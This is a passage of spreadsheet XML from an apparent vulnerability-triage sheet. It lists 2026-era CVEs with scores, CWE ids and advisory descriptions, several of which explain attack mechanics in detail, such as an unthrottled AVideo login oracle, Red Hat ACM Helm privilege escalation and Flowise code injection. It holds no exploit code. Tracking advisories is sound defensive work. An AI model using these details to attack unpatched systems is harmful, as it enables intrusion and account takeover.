      <c r="I221" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="L221" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit e01e41ecc (no patched version available) exposes get_api_preauthorize in plugin/API/API.php as a second, undocumented login path. Unlike get_api_signIn, which enforces a rate limit of 10 attempts per 5 minutes via checkRateLimit(), get_api_preauthorize performs the same credential check with no throttling for any client, allowing unlimited remote password guessing against arbitrary accounts, including admin. The endpoint also acts as a credential oracle: it returns the message "Invalid credentials" for both correct and incorrect passwords, while the users_id field in the response body discloses the authenticated identity (users_id:1 on success, users_id:0 on failure), and a correct password establishes a session cookie that remains usable for authenticated API requests. Together these issues permit unauthenticated brute-force account takeover.</t>
        </is>
      </c>
      <c r="M221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86729</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87806</t>
        </is>
      </c>
      <c r="C222" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D222" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E222" s="5" t="inlineStr"/>
      <c r="F222" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G222" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H222" s="5" t="inlineStr"/>
      <c r="I222" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J222" s="5" t="inlineStr"/>
      <c r="K222" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L222" s="5" t="inlineStr">
        <is>
          <t>Parse Server versions &lt;= 8.6.87 and &gt;= 9.0.0 &lt; 9.10.1-alpha.7 contain an authentication bypass in the built-in LDAP authentication adapter. The adapter forwarded the client-supplied password to the directory without verifying that a password had been supplied, and treated any non-error response from the directory as proof of authentication. A zero-length credential turns an LDAP simple bind into the unauthenticated authentication mechanism described in RFC 4513 section 5.1.2, which some directories (including Active Directory in its default configuration) answer with success while mapping the connection to anonymous. As a result, an unauthenticated attacker who knows a directory username can obtain a valid session token for that account, resulting in account takeover. Only deployments that enable the LDAP authentication adapter are affected, and deployments whose directory refuses unauthenticated simple bind (such as a stock OpenLDAP configuration) are not exploitable. The issue is fixed in 8.6.88 and 9.10.1-alpha.7, which require the password to be a non-empty string and reject the request before contacting the directory.</t>
        </is>
      </c>
      <c r="M222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87806</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10090</t>
        </is>
      </c>
      <c r="C223" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D223" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E223" s="5" t="inlineStr"/>
      <c r="F223" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G223" s="5" t="inlineStr">
        <is>
          <t>red hat, kubernetes</t>
        </is>
      </c>
      <c r="H223" s="5" t="inlineStr"/>
      <c r="I223" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr">
        <is>
          <t>CWE-267</t>
        </is>
      </c>
      <c r="L223" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Application Subscription controller (multicluster-operators-subscription) of Red Hat Advanced Cluster Management for Kubernetes (ACM). A user with namespace-scoped "edit" privileges in an ACM hub namespace can create a Channel resource pointing to a Helm repository they control and a Subscription resource referencing it. The app-subscription controller fetches and applies the Helm chart contents with its own elevated authority, without verifying whether the subscription creator holds the "open-cluster-management:subscription-admin" role and without restricting applied resources to the subscription namespace. This allows the attacker to include cluster-scoped resources in the Helm chart, such as a ClusterRoleBinding granting the attacker's ServiceAccount the "cluster-admin" ClusterRole. Successful exploitation results in full cluster-admin privilege escalation. This contradicts the ACM documentation which states that non-subscription-admin users should have resources deployed into the subscription namespace only.</t>
        </is>
      </c>
      <c r="M223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10090</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66768</t>
        </is>
      </c>
      <c r="C224" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D224" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E224" s="5" t="inlineStr"/>
      <c r="F224" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G224" s="5" t="inlineStr">
        <is>
          <t>java, sap</t>
        </is>
      </c>
      <c r="H224" s="5" t="inlineStr"/>
      <c r="I224" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J224" s="5" t="inlineStr"/>
      <c r="K224" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="L224" s="5" t="inlineStr">
        <is>
          <t>SAP GUI for Java does not correctly enforce the trust level policy for certain functions invoked from a connected backend system. A low-privileged attacker could exploit this weakness by manipulating a connected backend system to trigger affected functionality. This could allow arbitrary command execution on the victim's machine, leading to a high impact on the confidentiality, integrity, and availability of the affected system.</t>
        </is>
      </c>
      <c r="M224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66768</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69251</t>
        </is>
      </c>
      <c r="C225" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D225" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E225" s="5" t="inlineStr"/>
      <c r="F225" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G225" s="5" t="inlineStr">
        <is>
          <t>java, mysql</t>
        </is>
      </c>
      <c r="H225" s="5" t="inlineStr"/>
      <c r="I225" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J225" s="5" t="inlineStr"/>
      <c r="K225" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L225" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, Flowise record manager and agent memory nodes allowed users to set arbitrary TypeORM DataSource options through the additionalConfig input in packages/components/nodes/recordmanager/MySQLRecordManager/MySQLrecordManager.ts, packages/components/nodes/recordmanager/PostgresRecordManager/PostgresRecordManager.ts, packages/components/nodes/recordmanager/SQLiteRecordManager/SQLiteRecordManager.ts, packages/components/nodes/memory/AgentMemory/MySQLAgentMemory/MySQLAgentMemory.ts, and packages/components/nodes/memory/AgentMemory/AgentMemory.ts. TypeORM DataSource options such as entities, subscribers, and migrations can load local JavaScript files, allowing an authenticated user to execute arbitrary code on the server by uploading a JavaScript payload and referencing it from additionalConfig.entities. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69251</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69253</t>
        </is>
      </c>
      <c r="C226" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D226" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E226" s="5" t="inlineStr"/>
      <c r="F226" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G226" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H226" s="5" t="inlineStr"/>
      <c r="I226" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J226" s="5" t="inlineStr"/>
      <c r="K226" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L226" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag-and-drop user interface for building customized large language model (LLM) flows. Prior to version 3.1.3, several custom-tool components — AgentAsTool, ChatflowTool, and ExecuteFlow — ran code in the in-process  vm2  sandbox. To build that code, they inserted a user-controlled  baseURL  value straight into the JavaScript source, for example  const url = "${baseURL}/..."; . The only check on  baseURL  was  isValidURL , but a valid-looking URL can still contain characters that break out of a code string. An authenticated user could craft a  baseURL  that passed this check, closed the surrounding string, and injected their own JavaScript into the sandboxed script (code injection, CWE-94). The  vm2  sandbox runs in the same Node.js process as Flowise and exposes risky dependencies. As a result, the injected code could escape the sandbox and run arbitrary code on the Flowise server as the Flowise process user. Exploitation only requires an authenticated session. The issue is fixed in version 3.1.3, which passes the URL to the sandbox as data instead of inserting it into code and adds stricter URL validation.</t>
        </is>
      </c>
      <c r="M226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69253</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69854</t>
        </is>
      </c>
      <c r="C227" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D227" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E227" s="5" t="inlineStr"/>
      <c r="F227" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G227" s="5" t="inlineStr">
        <is>
          <t>spring, azure</t>
        </is>
      </c>
      <c r="H227" s="5" t="inlineStr"/>
      <c r="I227" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J227" s="5" t="inlineStr"/>
      <c r="K227" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L227" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in Spring Cloud Azure allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69854</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71851</t>
        </is>
      </c>
      <c r="C228" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D228" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E228" s="5" t="inlineStr"/>
      <c r="F228" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G228" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H228" s="5" t="inlineStr"/>
      <c r="I228" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J228" s="5" t="inlineStr"/>
      <c r="K228" s="5" t="inlineStr">
        <is>
          <t>CWE-331, CWE-334, CWE-338</t>
        </is>
      </c>
      <c r="L228" s="5" t="inlineStr">
        <is>
          <t>crypto-js is a JavaScript library of crypto standards. Versions of crypto-js prior to 4.0.0 generate randomness in CryptoJS.lib.WordArray.random() using a custom variation of the Multiply-With-Carry pseudorandom number generator, seeded from Math.random(), instead of a cryptographically secure source. This generator was introduced in version 3.1.2-4 and remained present in nearly every 3.x release. Nominal requests for 128 or 256 bits of entropy through this function produce effective search spaces of approximately 2 to the 39th and 2 to the 47th possibilities, small enough to enumerate on commodity hardware. Downstream wallet applications that used CryptoJS.lib.WordArray.random() as the entropy source for BIP39 recovery phrases are affected, and an attacker who enumerates the reduced output space can recover the resulting private keys and control the associated funds. This issue is fixed in version 4.0.0.</t>
        </is>
      </c>
      <c r="M228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71851</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73842</t>
        </is>
      </c>
      <c r="C229" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D229" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E229" s="5" t="inlineStr"/>
      <c r="F229" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G229" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H229" s="5" t="inlineStr"/>
      <c r="I229" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J229" s="5" t="inlineStr"/>
      <c r="K229" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="L229" s="5" t="inlineStr">
        <is>
          <t>OpenChoreo is a complete, open-source developer platform for Kubernetes. Prior to 1.0.3, 1.1.3, and 1.2.0-rc.2, internal/cluster-gateway/server.go exposed /api/proxy/, /api/exec/, and /api/wirelogs/ on an internal listener without requiring a client certificate or token, allowing any network-reachable caller to read tenant Kubernetes Secrets, mutate workloads, and execute commands across connected data planes. This issue is fixed in versions 1.0.3, 1.1.3, and 1.2.0-rc.2.</t>
        </is>
      </c>
      <c r="M229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73842</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75604</t>
        </is>
      </c>
      <c r="C230" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D230" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E230" s="5" t="inlineStr"/>
      <c r="F230" s="5" t="n">
        <v>0.025</v>
      </c>
      <c r="G230" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H230" s="5" t="inlineStr"/>
      <c r="I230" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J230" s="5" t="inlineStr"/>
      <c r="K230" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L230" s="5" t="inlineStr">
        <is>
          <t>Next.js is a React framework for building full-stack web applications. From 13.4.0 until 15.5.24 and 16.3.3, Next.js applications using Pages Router or App Router without Cache Components on Windows-hosted servers do not consistently escape backslashes in route segments before constructing incremental-cache paths. In packages/next/src/shared/lib/router/utils/escape-path-delimiters.ts and packages/next/src/server/lib/incremental-cache/file-system-cache.ts, a remote request can supply encoded Windows path separators that traverse outside the intended cache root and expose private build data, including the server-reference-manifest encryption key. Disclosure of that key can enable remote code execution in the affected application. This issue is fixed in versions 15.5.24 and 16.3.3.</t>
        </is>
      </c>
      <c r="M230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75604</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87911</t>
        </is>
      </c>
      <c r="C231" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D231" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E231" s="5" t="inlineStr"/>
      <c r="F231" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G231" s="5" t="inlineStr">
        <is>
          <t>postgresql, aws</t>
        </is>
      </c>
      <c r="H231" s="5" t="inlineStr"/>
      <c r="I231" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J231" s="5" t="inlineStr"/>
      <c r="K231" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-78</t>
        </is>
      </c>
      <c r="L231"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M231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87911</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-30156</t>
        </is>
      </c>
      <c r="C232" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E232" s="5" t="inlineStr"/>
      <c r="F232" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G232" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H232" s="5" t="inlineStr"/>
      <c r="I232" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J232" s="5" t="inlineStr"/>
      <c r="K232" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="L232" s="5" t="inlineStr">
        <is>
          <t>Ceph is an open-source distributed storage platform providing object, block, and file storage. In versions prior to 20.2.4 and 19.2.6, the CephX authentication protocol encrypts tickets with AES-128-CBC in an unauthenticated mode that uses a hard-coded initialization vector and no message authentication, allowing an attacker to forge credentials and gain cluster-wide access. Because the ciphertext is malleable and the monitor will encrypt attacker-chosen entity names, an attacker holding one low-privilege key and able to observe CephX traffic can use the monitor as an encryption oracle and splice ciphertext blocks into valid tickets for privileged entities such as Manager, MDS, and OSD. The same lack of authentication also lets an attacker with CephX permissions escalate privileges by flipping a single bit in a service ticket to set its allow_all field to true. This issue is fixed in versions 20.2.4 and 19.2.6.</t>
        </is>
      </c>
      <c r="M232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-30156</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21441</t>
        </is>
      </c>
      <c r="C233" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E233" s="5" t="inlineStr"/>
      <c r="F233" s="5" t="n">
        <v>0.03</v>
      </c>
      <c r="G233" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H233" s="5" t="inlineStr">
        <is>
          <t>python:urllib3</t>
        </is>
      </c>
      <c r="I233" s="5" t="inlineStr">
        <is>
          <t>2026-01-07</t>
        </is>
      </c>
      <c r="J233" s="5" t="inlineStr"/>
      <c r="K233" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L233" s="5" t="inlineStr">
        <is>
          <t>urllib3 is an HTTP client library for Python. urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption. Starting in version 1.22 and prior to version 2.6.3, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client. Applications and libraries are affected when they stream content from untrusted sources by setting `preload_content=False` when they do not disable redirects. Users should upgrade to at least urllib3 v2.6.3, in which the library does not decode content of redirect responses when `preload_content=False`. If upgrading is not immediately possible, disable redirects by setting `redirect=False` for requests to untrusted source.</t>
        </is>
      </c>
      <c r="M233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21441</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44432</t>
        </is>
      </c>
      <c r="C234" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E234" s="5" t="inlineStr"/>
      <c r="F234" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G234" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H234" s="5" t="inlineStr">
        <is>
          <t>python:urllib3</t>
        </is>
      </c>
      <c r="I234" s="5" t="inlineStr">
        <is>
          <t>2026-05-13</t>
        </is>
      </c>
      <c r="J234" s="5" t="inlineStr"/>
      <c r="K234" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L234" s="5" t="inlineStr">
        <is>
          <t>urllib3 is an HTTP client library for Python. From 2.6.0 to before 2.7.0, urllib3 could decompress the whole response instead of the requested portion (1) during the second HTTPResponse.read(amt=N) call when the response was decompressed using the official Brotli library or (2) when HTTPResponse.drain_conn() was called after the response had been read and decompressed partially (compression algorithm did not matter here). These issues could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This could result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data) on the client side. This vulnerability is fixed in 2.7.0.</t>
        </is>
      </c>
      <c r="M234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44432</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5598</t>
        </is>
      </c>
      <c r="C235" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E235" s="5" t="inlineStr"/>
      <c r="F235" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G235" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H235" s="5" t="inlineStr"/>
      <c r="I235" s="5" t="inlineStr">
        <is>
          <t>2026-04-15</t>
        </is>
      </c>
      <c r="J235" s="5" t="inlineStr"/>
      <c r="K235" s="5" t="inlineStr">
        <is>
          <t>CWE-385</t>
        </is>
      </c>
      <c r="L235" s="5" t="inlineStr">
        <is>
          <t>Covert timing channel vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA core on all (core modules).
 This vulnerability is associated with program files FrodoEngine.Java.
This issue affects BC-JAVA: from 1.71 before 1.80.2, from 1.81 before 1.81.1, from 1.82 before 1.84.</t>
        </is>
      </c>
      <c r="M235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5598</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-52251</t>
        </is>
      </c>
      <c r="C236" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E236" s="5" t="inlineStr"/>
      <c r="F236" s="5" t="n">
        <v>0.868</v>
      </c>
      <c r="G236" s="5" t="inlineStr">
        <is>
          <t>kafka</t>
        </is>
      </c>
      <c r="H236" s="5" t="inlineStr">
        <is>
          <t>provectus:ui</t>
        </is>
      </c>
      <c r="I236" s="5" t="inlineStr">
        <is>
          <t>2024-01-25</t>
        </is>
      </c>
      <c r="J236" s="5" t="inlineStr"/>
      <c r="K236" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L236" s="5" t="inlineStr">
        <is>
          <t>An issue discovered in provectus kafka-ui 0.4.0 through 0.7.2 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages. No fixed release is available; the project has had no commit since 2024-04-08.</t>
        </is>
      </c>
      <c r="M236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-52251</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16745</t>
        </is>
      </c>
      <c r="C237" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E237" s="5" t="inlineStr"/>
      <c r="F237" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G237" s="5" t="inlineStr">
        <is>
          <t>red hat, kubernetes</t>
        </is>
      </c>
      <c r="H237" s="5" t="inlineStr"/>
      <c r="I237" s="5" t="inlineStr">
        <is>
          <t>2026-07-23</t>
        </is>
      </c>
      <c r="J237" s="5" t="inlineStr"/>
      <c r="K237" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L237" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in odh-dashboard, the web console component of Red Hat OpenShift AI (RHOAI). Due to incorrect network binding, a malicious actor within the cluster can bypass authentication and impersonate any user by providing an arbitrary access token. This allows an attacker to gain unauthorized access to the Kubernetes API, potentially leading to arbitrary code execution, privilege escalation, or information disclosure.</t>
        </is>
      </c>
      <c r="M237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16745</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18341</t>
        </is>
      </c>
      <c r="C238" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E238" s="5" t="inlineStr"/>
      <c r="F238" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G238" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H238" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I238" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J238" s="5" t="inlineStr"/>
      <c r="K238" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="L238" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to corrupt memory due to an integer underflow.</t>
        </is>
      </c>
      <c r="M238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18341</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18486</t>
        </is>
      </c>
      <c r="C239" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E239" s="5" t="inlineStr"/>
      <c r="F239" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G239" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H239" s="5" t="inlineStr"/>
      <c r="I239" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J239" s="5" t="inlineStr"/>
      <c r="K239" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L239" s="5" t="inlineStr">
        <is>
          <t>IBM ContextForge MCP Gateway &lt;= v1.0.7 MCP Context Forge could allow a remote authenticated attacker to obtain sensitive credentials and escalate privileges due to improper validation of jq filters.</t>
        </is>
      </c>
      <c r="M239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18486</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18617</t>
        </is>
      </c>
      <c r="C240" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E240" s="5" t="inlineStr"/>
      <c r="F240" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G240" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H240" s="5" t="inlineStr"/>
